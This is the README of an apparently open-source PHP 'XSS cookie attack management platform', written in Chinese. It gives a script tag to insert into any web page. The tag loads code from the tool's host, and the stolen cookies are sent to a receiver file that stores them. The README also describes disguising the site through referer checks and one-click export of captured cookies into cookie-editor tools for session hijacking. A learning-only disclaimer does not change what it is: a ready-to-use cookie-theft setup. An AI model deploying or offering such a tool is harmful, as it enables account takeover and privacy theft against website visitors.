xss个人攻击测试cookie管理平台

php写的个人研究测试用的 xss cookie 攻击管理平台,开源出来

由于在实际测试中需要非常高的执行速度，所以并没有采用框架

本地测试

虚拟主机域名:xs.com

<script src="//xs.com"></script>

任意网页中插入以上代码

仅用于学习交流，禁止用于非法行为，后果自付

目录结构

www WEB部署目录（或者子目录） ├─admin 后台目录 │ ├─api.php 删除记录，与改变数据状态的请求 │ ├─auth.php 登录认证 │ ├─function.php 分页类与日期格化函数 │ ├─login.php 后台登陆 │ └─web.php 后台管理主页 | ├─asset 资源目录 │ ├─common.css 样式文件 │ └─error.gif 图标 │ ├─mailer 邮件类,本项目中默认未使用到可删除 │ ├─cnzz.php xs接收地址文件,用于把接收到的cookie送入数据库 ├─config.php 配置文件，配置后台登录用户名，密码，数据库,以及表名 ├─index.php 网站首页 └─xss.sql 默认数据库，自行导入

使用

导入xss.sql到数据库 正确的配置config.php 虚拟主机的默认首页名，指向index.php 正确的配置index.php中 js代码的接收地址,为了提高运行速度并没有在config中配置xs接收地址

功能

浏览器访问主页，检测HTTP_REFERER,直接地址栏输入访问，返回错误提示 伪装 只有在源代码中点击script链接才能查看到js代码 后台管理中心点击[cookie]可以一键复制，导入到editthiscookie等工具中使用

So 然而并卵

当今的互联网对xss的防范已经做得比较到位了，一般稍微像样点儿的框架都做了防护。只有测试一些古老的asp,或者一些程序员偷懒不做过滤的